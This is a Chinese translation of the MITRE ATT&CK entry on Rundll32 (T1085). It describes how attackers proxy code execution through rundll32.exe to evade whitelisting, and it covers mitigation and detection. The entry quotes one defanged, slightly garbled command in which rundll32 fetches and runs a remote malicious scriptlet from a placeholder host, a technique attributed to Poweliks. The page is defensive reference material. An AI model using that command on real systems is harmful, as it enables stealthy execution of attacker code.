ATT&CK-CN V1.0 Last Update: 2019-03 [返回索引页]

译者: 林妙倩(清华大学网络研究院网络空间安全实习生) 原创翻译作品,如果需要转载请取得翻译作者同意。

数据来源:ATT&CK Matrices

原文: https://attack.mitre.org/techniques/T1085

术语表: /attack/glossary

Rundll32

可以调用 rundll32.exe 程序来执行任意二进制文件。由于 Windows 使用 rundll32.exe 进行正常操作时会有白名单或误报,攻击者可以利用此功能来代理代码的执行,以避免触发可能未监控 rundll32.exe 进程执行的安全工具的检测。­ Rundll32.exe 可通过未记录的 shell32.dll 的 Control_RunDLLControl_RunDLLAsUser 函数来执行控制面板项文件(.CPL)。双击。cpl 文件也可以执行 rundll32.exe。Rundll32 也可用于执行 JavaScript 等脚本。这可以使用类似的语法来完成:rundll32.exe javascript: " ..,RunHTMLApplication ";document.write();GetObject("script:https[:]/www[.]example[.] . com malicious.sct ")"在恶意软件(例如 Poweliks)中已有这种行为。

缓解

Microsoft 增强型缓解体验工具包 (EMET) 的攻击面减少 (Attack Surface Reduction,ASR) 功能可以用来阻止利用 rundll32.exe 绕过白名单的方法。

检测

使用进程监控来监控 rundll32.exe 的执行和参数。 将 rundll32.exe 最近调用与之前的已知良好参数和被加载的 dll 进行比较,以确定异常和潜在的攻击活动。 rundll32.exe 调用中使用的命令参数也可能有助于确定加载 DLL 的来源和目的。